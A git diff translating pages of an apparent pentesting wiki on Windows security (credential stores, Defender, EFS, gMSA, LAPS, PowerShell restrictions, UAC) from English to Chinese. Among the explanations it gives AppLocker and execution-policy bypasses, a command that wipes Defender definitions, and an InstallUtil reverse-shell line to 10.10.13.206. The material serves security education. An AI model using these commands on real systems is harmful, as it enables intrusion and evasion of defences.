 C:\Windows\System32\spool\drivers\color
 C:\Windows\Tasks
 C:\windows\tracing
 ```
+- 常见的 **trusted** [**"LOLBAS's"**](https://lolbas-project.github.io/) 二进制文件也可以用于绕过 AppLocker。
+- **编写不当的规则也可能被绕过**
+- 例如，**`<FilePathCondition Path="%OSDRIVE%*\allowed*"/>`**，您可以在任何地方创建一个 **名为 `allowed`** 的文件夹，它将被允许。
+- 组织通常还会专注于 **阻止 `%System32%\WindowsPowerShell\v1.0\powershell.exe` 可执行文件**，但忘记了 **其他** [**PowerShell 可执行文件位置**](https://www.powershelladmin.com/wiki/PowerShell_Executables_File_System_Locations)，例如 `%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe` 或 `PowerShell_ISE.exe`。
+- **DLL 强制执行很少启用**，因为它可能对系统造成额外负担，并且需要大量测试以确保不会出现故障。因此，使用 **DLL 作为后门将有助于绕过 AppLocker**。
+- 您可以使用 [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) 或 [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) 在任何进程中 **执行 Powershell** 代码并绕过 AppLocker。有关更多信息，请查看: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode)。
 
-- Commonly **trusted** [**"LOLBAS's"**](https://lolbas-project.github.io/) binaries can be also useful to bypass AppLocker.
-- **Poorly written rules could also be bypassed**
-  - For example, **`<FilePathCondition Path="%OSDRIVE%*\allowed*"/>`**, you can create a **folder called `allowed`** anywhere and it will be allowed.
-  - Organizations also often focus on **blocking the `%System32%\WindowsPowerShell\v1.0\powershell.exe` executable**, but forget about the **other** [**PowerShell executable locations**](https://www.powershelladmin.com/wiki/PowerShell_Executables_File_System_Locations) such as `%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe` or `PowerShell_ISE.exe`.
-- **DLL enforcement very rarely enabled** due to the additional load it can put on a system, and the amount of testing required to ensure nothing will break. So using **DLLs as backdoors will help bypassing AppLocker**.
-- You can use [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) or [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) to **execute Powershell** code in any process and bypass AppLocker. For more info check: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode).
+## 凭据存储
 
-## Credentials Storage
+### 安全账户管理器 (SAM)
 
-### Security Accounts Manager (SAM)
+本地凭据存储在此文件中，密码经过哈希处理。
 
-Local credentials are present in this file, the passwords are hashed.
+### 本地安全机构 (LSA) - LSASS
 
-### Local Security Authority (LSA) - LSASS
+**凭据**（哈希）被 **保存** 在此子系统的 **内存** 中，以实现单点登录。\
+**LSA** 管理本地 **安全策略**（密码策略、用户权限...）、**身份验证**、**访问令牌**...\
+LSA 将是 **检查** 提供的凭据的 **SAM** 文件（用于本地登录）并与 **域控制器** 进行通信以验证域用户。
 
-The **credentials** (hashed) are **saved** in the **memory** of this subsystem for Single Sign-On reasons.\
-**LSA** administrates the local **security policy** (password policy, users permissions...), **authentication**, **access tokens**...\
-LSA will be the one that will **check** for provided credentials inside the **SAM** file (for a local login) and **talk** with the **domain controller** to authenticate a domain user.
+**凭据** 被 **保存** 在 **进程 LSASS** 中：Kerberos 票证、NT 和 LM 哈希、易于解密的密码。
 
-The **credentials** are **saved** inside the **process LSASS**: Kerberos tickets, hashes NT and LM, easily decrypted passwords.
+### LSA 秘密
 
-### LSA secrets
+LSA 可能会在磁盘上保存一些凭据：
 
-LSA could save in disk some credentials:
-
-- Password of the computer account of the Active Directory (unreachable domain controller).
-- Passwords of the accounts of Windows services
-- Passwords for scheduled tasks
-- More (password of IIS applications...)
+- Active Directory 的计算机账户密码（无法访问的域控制器）。
+- Windows 服务账户的密码
+- 计划任务的密码
+- 更多（IIS 应用程序的密码...）
 
 ### NTDS.dit
 
-It is the database of the Active Directory. It is only present in Domain Controllers.
+这是 Active Directory 的数据库。它仅存在于域控制器中。
 
 ## Defender
 
-[**Microsoft Defender**](https://en.wikipedia.org/wiki/Microsoft_Defender) is an Antivirus that is available in Windows 10 and Windows 11, and in versions of Windows Server. It **blocks** common pentesting tools such as **`WinPEAS`**. However, there are ways to **bypass these protections**.
+[**Microsoft Defender**](https://en.wikipedia.org/wiki/Microsoft_Defender) 是 Windows 10 和 Windows 11 以及 Windows Server 版本中可用的防病毒软件。它 **阻止** 常见的渗透测试工具，如 **`WinPEAS`**。但是，有方法可以 **绕过这些保护**。
 
-### Check
+### 检查
 
-To check the **status** of **Defender** you can execute the PS cmdlet **`Get-MpComputerStatus`** (check the value of **`RealTimeProtectionEnabled`** to know if it's active):
+要检查 **Defender** 的 **状态**，您可以执行 PS cmdlet **`Get-MpComputerStatus`**（检查 **`RealTimeProtectionEnabled`** 的值以了解它是否处于活动状态）：
 
 <pre class="language-powershell"><code class="lang-powershell">PS C:\> Get-MpComputerStatus
 
@@ -103,8 +99,7 @@ NISEngineVersion                : 0.0.0.0
 PSComputerName                  :
 </code></pre>
 
-To enumerate it you could also run:
-
+要枚举它，您还可以运行：
 ```bash
 WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
 wmic /namespace:\\root\securitycenter2 path antivirusproduct
@@ -113,113 +108,101 @@ sc query windefend
 #Delete all rules of Defender (useful for machines without internet access)
 "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
 ```
+## 加密文件系统 (EFS)
 
-## Encrypted File System (EFS)
+EFS 通过加密保护文件，使用称为 **文件加密密钥 (FEK)** 的 **对称密钥**。该密钥使用用户的 **公钥** 进行加密，并存储在加密文件的 $EFS **替代数据流** 中。当需要解密时，使用用户数字证书的相应 **私钥** 从 $EFS 流中解密 FEK。更多详细信息可以在 [这里](https://en.wikipedia.org/wiki/Encrypting_File_System) 找到。
 
-EFS secures files through encryption, utilizing a **symmetric key** known as the **File Encryption Key (FEK)**. This key is encrypted with the user's **public key** and stored within the encrypted file's $EFS **alternative data stream**. When decryption is needed, the corresponding **private key** of the user's digital certificate is used to decrypt the FEK from the $EFS stream. More details can be found [here](https://en.wikipedia.org/wiki/Encrypting_File_System).
+**无需用户启动的解密场景** 包括：
 
-**Decryption scenarios without user initiation** include:
+- 当文件或文件夹移动到非 EFS 文件系统（如 [FAT32](https://en.wikipedia.org/wiki/File_Allocation_Table)）时，它们会自动解密。
+- 通过 SMB/CIFS 协议在网络上传输的加密文件在传输前会被解密。
 
-- When files or folders are moved to a non-EFS file system, like [FAT32](https://en.wikipedia.org/wiki/File_Allocation_Table), they are automatically decrypted.
-- Encrypted files sent over the network via SMB/CIFS protocol are decrypted prior to transmission.
+这种加密方法允许所有者对加密文件进行 **透明访问**。然而，仅仅更改所有者的密码并登录并不能允许解密。
 
-This encryption method allows **transparent access** to encrypted files for the owner. However, simply changing the owner's password and logging in will not permit decryption.
+**关键要点**：
 
-**Key Takeaways**:
+- EFS 使用对称 FEK，使用用户的公钥加密。
+- 解密使用用户的私钥访问 FEK。
+- 在特定条件下会自动解密，例如复制到 FAT32 或网络传输。
+- 加密文件对所有者可访问，无需额外步骤。
 
-- EFS uses a symmetric FEK, encrypted with the user's public key.
-- Decryption employs the user's private key to access the FEK.
-- Automatic decryption occurs under specific conditions, like copying to FAT32 or network transmission.
-- Encrypted files are accessible to the owner without additional steps.
+### 检查 EFS 信息
 
-### Check EFS info
+检查 **用户** 是否 **使用** 了此 **服务**，检查此路径是否存在：`C:\users\<username>\appdata\roaming\Microsoft\Protect`
 
-Check if a **user** has **used** this **service** checking if this path exists:`C:\users\<username>\appdata\roaming\Microsoft\Protect`
+使用 cipher /c \<file\> 检查 **谁** 有 **访问** 文件的权限\
+您还可以在文件夹内使用 `cipher /e` 和 `cipher /d` 来 **加密** 和 **解密** 所有文件
 
-Check **who** has **access** to the file using cipher /c \<file>\
-You can also use `cipher /e` and `cipher /d` inside a folder to **encrypt** and **decrypt** all the files
+### 解密 EFS 文件
 
-### Decrypting EFS files
+#### 成为权限系统
 
-#### Being Authority System
+这种方式要求 **受害者用户** 在主机内 **运行** 一个 **进程**。如果是这种情况，使用 `meterpreter` 会话可以模拟用户进程的令牌（`impersonate_token` 来自 `incognito`）。或者您可以直接 `migrate` 到用户的进程。
 
-This way requires the **victim user** to be **running** a **process** inside the host. If that is the case, using a `meterpreter` sessions you can impersonate the token of the process of the user (`impersonate_token` from `incognito`). Or you could just `migrate` to process of the user.
-
-#### Knowing the users password
+#### 知道用户密码
 
 {% embed url="https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files" %}
 
-## Group Managed Service Accounts (gMSA)
+## 组管理服务账户 (gMSA)
 
-Microsoft developed **Group Managed Service Accounts (gMSA)** to simplify the management of service accounts in IT infrastructures. Unlike traditional service accounts that often have the "**Password never expire**" setting enabled, gMSAs offer a more secure and manageable solution:
+微软开发了 **组管理服务账户 (gMSA)** 以简化 IT 基础设施中服务账户的管理。与传统的服务账户（通常启用“**密码永不过期**”设置）不同，gMSA 提供了更安全和可管理的解决方案：
 
-- **Automatic Password Management**: gMSAs use a complex, 240-character password that automatically changes according to domain or computer policy. This process is handled by Microsoft's Key Distribution Service (KDC), eliminating the need for manual password updates.
-- **Enhanced Security**: These accounts are immune to lockouts and cannot be used for interactive logins, enhancing their security.
-- **Multiple Host Support**: gMSAs can be shared across multiple hosts, making them ideal for services running on multiple servers.
-- **Scheduled Task Capability**: Unlike managed service accounts, gMSAs support running scheduled tasks.
-- **Simplified SPN Management**: The system automatically updates the Service Principal Name (SPN) when there are changes to the computer's sAMaccount details or DNS name, simplifying SPN management.
+- **自动密码管理**：gMSA 使用复杂的 240 字符密码，自动根据域或计算机策略进行更改。此过程由微软的密钥分发服务 (KDC) 处理，消除了手动更新密码的需要。
+- **增强安全性**：这些账户免受锁定，并且不能用于交互式登录，从而增强了安全性。
+- **多主机支持**：gMSA 可以在多个主机之间共享，非常适合在多个服务器上运行的服务。
+- **计划任务能力**：与管理服务账户不同，gMSA 支持运行计划任务。
+- **简化 SPN 管理**：当计算机的 sAMaccount 详细信息或 DNS 名称发生更改时，系统会自动更新服务主体名称 (SPN)，简化 SPN 管理。
 
-The passwords for gMSAs are stored in the LDAP property _**msDS-ManagedPassword**_ and are automatically reset every 30 days by Domain Controllers (DCs). This password, an encrypted data blob known as [MSDS-MANAGEDPASSWORD_BLOB](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e), can only be retrieved by authorized administrators and the servers on which the gMSAs are installed, ensuring a secure environment. To access this information, a secured connection such as LDAPS is required, or the connection must be authenticated with 'Sealing & Secure'.
+gMSA 的密码存储在 LDAP 属性 _**msDS-ManagedPassword**_ 中，并由域控制器 (DC) 每 30 天自动重置。此密码是一个称为 [MSDS-MANAGEDPASSWORD_BLOB](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e) 的加密数据块，仅可由授权管理员和安装 gMSA 的服务器检索，从而确保安全环境。要访问此信息，需要安全连接，例如 LDAPS，或者连接必须经过“密封和安全”认证。
 
 ![https://cube0x0.github.io/Relaying-for-gMSA/](../../images/asd1.png)
 
-You can read this password with [**GMSAPasswordReader**](https://github.com/rvazarkar/GMSAPasswordReader)**:**
-
+您可以使用 [**GMSAPasswordReader**](https://github.com/rvazarkar/GMSAPasswordReader)**：
 ```
 /GMSAPasswordReader --AccountName jkohler
 ```
+[**在此帖子中找到更多信息**](https://cube0x0.github.io/Relaying-for-gMSA/)
 
-[**Find more info in this post**](https://cube0x0.github.io/Relaying-for-gMSA/)
-
-Also, check this [web page](https://cube0x0.github.io/Relaying-for-gMSA/) about how to perform a **NTLM relay attack** to **read** the **password** of **gMSA**.
+此外，请查看此[网页](https://cube0x0.github.io/Relaying-for-gMSA/)关于如何执行**NTLM中继攻击**以**读取** **gMSA**的**密码**。
 
 ## LAPS
 
-The **Local Administrator Password Solution (LAPS)**, available for download from [Microsoft](https://www.microsoft.com/en-us/download/details.aspx?id=46899), enables the management of local Administrator passwords. These passwords, which are **randomized**, unique, and **regularly changed**, are stored centrally in Active Directory. Access to these passwords is restricted through ACLs to authorized users. With sufficient permissions granted, the ability to read local admin passwords is provided.
+**本地管理员密码解决方案 (LAPS)**，可从[Microsoft](https://www.microsoft.com/en-us/download/details.aspx?id=46899)下载，允许管理本地管理员密码。这些密码是**随机生成**、唯一且**定期更改**的，集中存储在Active Directory中。对这些密码的访问通过ACL限制为授权用户。授予足够的权限后，可以读取本地管理员密码。
 
 {{#ref}}
 ../active-directory-methodology/laps.md
 {{#endref}}
 
-## PS Constrained Language Mode
+## PS受限语言模式
 
-PowerShell [**Constrained Language Mode**](https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/) **locks down many of the features** needed to use PowerShell effectively, such as blocking COM objects, only allowing approved .NET types, XAML-based workflows, PowerShell classes, and more.
-
-### **Check**
+PowerShell [**受限语言模式**](https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/) **锁定了许多**有效使用PowerShell所需的功能，例如阻止COM对象，仅允许批准的.NET类型、基于XAML的工作流、PowerShell类等。
 
+### **检查**
 ```powershell
 $ExecutionContext.SessionState.LanguageMode
 #Values could be: FullLanguage or ConstrainedLanguage
 ```
-
-### Bypass
-
+### 绕过
 ```powershell
 #Easy bypass
 Powershell -version 2
 ```
+在当前的Windows中，绕过方法将不起作用，但您可以使用[ **PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM)。\
+**要编译它，您可能需要** **_添加引用_** -> _浏览_ -> _浏览_ -> 添加 `C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll` 并**将项目更改为 .Net4.5**。
 
-In current Windows that Bypass won't work but you can use[ **PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM).\
-**To compile it you may need** **to** _**Add a Reference**_ -> _Browse_ ->_Browse_ -> add `C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll` and **change the project to .Net4.5**.
-
-#### Direct bypass:
-
+#### 直接绕过：
 ```bash
 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U c:\temp\psby.exe
 ```
-
-#### Reverse shell:
-
+#### 反向 shell:
 ```bash
 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\psby.exe
 ```
+您可以使用 [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) 或 [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) 来 **执行 Powershell** 代码在任何进程中并绕过受限模式。有关更多信息，请查看: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode)。
 
-You can use [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) or [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) to **execute Powershell** code in any process and bypass the constrained mode. For more info check: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode).
-
-## PS Execution Policy
-
-By default it is set to **restricted.** Main ways to bypass this policy:
+## PS 执行策略
 
+默认情况下，它设置为 **restricted.** 绕过此策略的主要方法：
 ```powershell
 1º Just copy and paste inside the interactive PS console
 2º Read en Exec
@@ -239,33 +222,32 @@ Powershell -command "Write-Host 'My voice is my passport, verify me.'"
 9º Use EncodeCommand
 $command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand
 ```
+更多信息可以在 [这里](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/) 找到
 
-More can be found [here](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/)
+## 安全支持提供者接口 (SSPI)
 
-## Security Support Provider Interface (SSPI)
+是用于验证用户的 API。
 
-Is the API that can be use to authenticate users.
+SSPI 将负责为想要通信的两台机器找到合适的协议。首选方法是 Kerberos。然后，SSPI 将协商使用哪个身份验证协议，这些身份验证协议称为安全支持提供者 (SSP)，以 DLL 形式位于每台 Windows 机器内部，且两台机器必须支持相同的协议才能进行通信。
 
-The SSPI will be in charge of finding the adequate protocol for two machines that want to communicate. The preferred method for this is Kerberos. Then the SSPI will negotiate which authentication protocol will be used, these authentication protocols are called Security Support Provider (SSP), are located inside each Windows machine in the form of a DLL and both machines must support the same to be able to communicate.
+### 主要 SSPs
 
-### Main SSPs
+- **Kerberos**: 首选
+- %windir%\Windows\System32\kerberos.dll
+- **NTLMv1** 和 **NTLMv2**: 兼容性原因
+- %windir%\Windows\System32\msv1_0.dll
+- **Digest**: Web 服务器和 LDAP，密码以 MD5 哈希形式存在
+- %windir%\Windows\System32\Wdigest.dll
+- **Schannel**: SSL 和 TLS
+- %windir%\Windows\System32\Schannel.dll
+- **Negotiate**: 用于协商使用的协议（Kerberos 或 NTLM，默认是 Kerberos）
+- %windir%\Windows\System32\lsasrv.dll
 
-- **Kerberos**: The preferred one
-  - %windir%\Windows\System32\kerberos.dll
-- **NTLMv1** and **NTLMv2**: Compatibility reasons
-  - %windir%\Windows\System32\msv1_0.dll
-- **Digest**: Web servers and LDAP, password in form of a MD5 hash
-  - %windir%\Windows\System32\Wdigest.dll
-- **Schannel**: SSL and TLS
-  - %windir%\Windows\System32\Schannel.dll
-- **Negotiate**: It is used to negotiate the protocol to use (Kerberos or NTLM being Kerberos the default one)
-  - %windir%\Windows\System32\lsasrv.dll
+#### 协商可能提供多种方法或仅提供一种。
 
-#### The negotiation could offer several methods or only one.
+## UAC - 用户帐户控制
 
-## UAC - User Account Control
-
-[User Account Control (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) is a feature that enables a **consent prompt for elevated activities**.
+[用户帐户控制 (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) 是一个启用 **提升活动的同意提示** 的功能。
 
 {{#ref}}
 uac-user-account-control.md
@@ -274,12 +256,11 @@ uac-user-account-control.md
 <figure><img src="../../images/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) 轻松构建和 **自动化工作流程**，由世界上 **最先进** 的社区工具提供支持。\
+立即获取访问权限：
 
 {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
 
 ---
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md b/src/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md
index cd589f967..e50c61271 100644
--- a/src/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md
+++ b/src/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md
@@ -1,131 +1,122 @@
-# UAC - User Account Control
+# UAC - 用户帐户控制
 
 {{#include ../../banners/hacktricks-training.md}}
 
 <figure><img src="../../images/image (48).png" alt=""><figcaption></figcaption></figure>
 
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) 轻松构建和 **自动化工作流**，由世界上 **最先进** 的社区工具提供支持。\
+立即获取访问权限：
 
 {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
 
 ## UAC
 
-[User Account Control (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) is a feature that enables a **consent prompt for elevated activities**. Applications have different `integrity` levels, and a program with a **high level** can perform tasks that **could potentially compromise the system**. When UAC is enabled, applications and tasks always **run under the security context of a non-administrator account** unless an administrator explicitly authorizes these applications/tasks to have administrator-level access to the system to run. It is a convenience feature that protects administrators from unintended changes but is not considered a security boundary.
+[用户帐户控制 (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) 是一个功能，允许 **提升活动的同意提示**。应用程序具有不同的 `integrity` 级别，具有 **高级别** 的程序可以执行 **可能危害系统** 的任务。当 UAC 启用时，应用程序和任务始终 **在非管理员帐户的安全上下文中运行**，除非管理员明确授权这些应用程序/任务以管理员级别访问系统进行运行。这是一个便利功能，可以保护管理员免受意外更改，但不被视为安全边界。
 
-For more info about integrity levels:
+有关完整性级别的更多信息：
 
 {{#ref}}
 ../windows-local-privilege-escalation/integrity-levels.md
 {{#endref}}
 
-When UAC is in place, an administrator user is given 2 tokens: a standard user key, to perform regular actions as regular level, and one with the admin privileges.
+当 UAC 生效时，管理员用户会获得 2 个令牌：一个标准用户密钥，用于以常规级别执行常规操作，另一个则具有管理员权限。
 
-This [page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) discusses how UAC works in great depth and includes the logon process, user experience, and UAC architecture. Administrators can use security policies to configure how UAC works specific to their organization at the local level (using secpol.msc), or configured and pushed out via Group Policy Objects (GPO) in an Active Directory domain environment. The various settings are discussed in detail [here](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-security-policy-settings). There are 10 Group Policy settings that can be set for UAC. The following table provides additional detail:
+此 [页面](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) 深入讨论了 UAC 的工作原理，包括登录过程、用户体验和 UAC 架构。管理员可以使用安全策略在本地级别（使用 secpol.msc）配置 UAC 的工作方式，或通过组策略对象 (GPO) 在 Active Directory 域环境中配置并推送。各种设置在 [这里](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-security-policy-settings) 进行了详细讨论。可以为 UAC 设置 10 个组策略设置。以下表格提供了更多详细信息：
 
-| Group Policy Setting                                                                                                                                                                                                                                                                                                                                                           | Registry Key                | Default Setting                                              |
+| 组策略设置                                                                                                                                                                                                                                                                                                                                                           | 注册表项                | 默认设置                                              |
 | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | --------------------------- | ------------------------------------------------------------ |
-| [User Account Control: Admin Approval Mode for the built-in Administrator account](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-admin-approval-mode-for-the-built-in-administrator-account)                                                     | FilterAdministratorToken    | Disabled                                                     |
-| [User Account Control: Allow UIAccess applications to prompt for elevation without using the secure desktop](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-allow-uiaccess-applications-to-prompt-for-elevation-without-using-the-secure-desktop) | EnableUIADesktopToggle      | Disabled                                                     |
-| [User Account Control: Behavior of the elevation prompt for administrators in Admin Approval Mode](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-administrators-in-admin-approval-mode)                     | ConsentPromptBehaviorAdmin  | Prompt for consent for non-Windows binaries                  |
-| [User Account Control: Behavior of the elevation prompt for standard users](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-standard-users)                                                                   | ConsentPromptBehaviorUser   | Prompt for credentials on the secure desktop                 |
-| [User Account Control: Detect application installations and prompt for elevation](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-detect-application-installations-and-prompt-for-elevation)                                                       | EnableInstallerDetection    | Enabled (default for home) Disabled (default for enterprise) |
-| [User Account Control: Only elevate executables that are signed and validated](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-executables-that-are-signed-and-validated)                                                             | ValidateAdminCodeSignatures | Disabled                                                     |
-| [User Account Control: Only elevate UIAccess applications that are installed in secure locations](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-uiaccess-applications-that-are-installed-in-secure-locations)                       | EnableSecureUIAPaths        | Enabled                                                      |
-| [User Account Control: Run all administrators in Admin Approval Mode](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-run-all-administrators-in-admin-approval-mode)                                                                               | EnableLUA                   | Enabled                                                      |
-| [User Account Control: Switch to the secure desktop when prompting for elevation](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-switch-to-the-secure-desktop-when-prompting-for-elevation)                                                       | PromptOnSecureDesktop       | Enabled                                                      |
-| [User Account Control: Virtualize file and registry write failures to per-user locations](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-virtualize-file-and-registry-write-failures-to-per-user-locations)                                       | EnableVirtualization        | Enabled                                                      |
+| [用户帐户控制：内置管理员帐户的管理员批准模式](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-admin-approval-mode-for-the-built-in-administrator-account)                                                     | FilterAdministratorToken    | 禁用                                                     |
+| [用户帐户控制：允许 UIAccess 应用程序在不使用安全桌面的情况下提示提升](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-allow-uiaccess-applications-to-prompt-for-elevation-without-using-the-secure-desktop) | EnableUIADesktopToggle      | 禁用                                                     |
+| [用户帐户控制：管理员在管理员批准模式下的提升提示行为](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-administrators-in-admin-approval-mode)                     | ConsentPromptBehaviorAdmin  | 对非 Windows 二进制文件提示同意                  |
+| [用户帐户控制：标准用户的提升提示行为](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-standard-users)                                                                   | ConsentPromptBehaviorUser   | 在安全桌面上提示凭据                 |
+| [用户帐户控制：检测应用程序安装并提示提升](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-detect-application-installations-and-prompt-for-elevation)                                                       | EnableInstallerDetection    | 启用（家庭版默认） 禁用（企业版默认） |
+| [用户帐户控制：仅提升已签名和验证的可执行文件](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-executables-that-are-signed-and-validated)                                                             | ValidateAdminCodeSignatures | 禁用                                                     |
+| [用户帐户控制：仅提升安装在安全位置的 UIAccess 应用程序](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-uiaccess-applications-that-are-installed-in-secure-locations)                       | EnableSecureUIAPaths        | 启用                                                      |
+| [用户帐户控制：在管理员批准模式下运行所有管理员](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-run-all-administrators-in-admin-approval-mode)                                                                               | EnableLUA                   | 启用                                                      |
+| [用户帐户控制：在提示提升时切换到安全桌面](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-switch-to-the-secure-desktop-when-prompting-for-elevation)                                                       | PromptOnSecureDesktop       | 启用                                                      |
+| [用户帐户控制：将文件和注册表写入失败虚拟化到每用户位置](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-virtualize-file-and-registry-write-failures-to-per-user-locations)                                       | EnableVirtualization        | 启用                                                      |
 
-### UAC Bypass Theory
+### UAC 绕过理论
 
-Some programs are **autoelevated automatically** if the **user belongs** to the **administrator group**. These binaries have inside their _**Manifests**_ the _**autoElevate**_ option with value _**True**_. The binary has to be **signed by Microsoft** also.
+一些程序会在 **用户属于** **管理员组** 时 **自动提升**。这些二进制文件在其 _**清单**_ 中具有 _**autoElevate**_ 选项，值为 _**True**_。该二进制文件还必须 **由 Microsoft 签名**。
 
-Then, to **bypass** the **UAC** (elevate from **medium** integrity level **to high**) some attackers use this kind of binaries to **execute arbitrary code** because it will be executed from a **High level integrity process**.
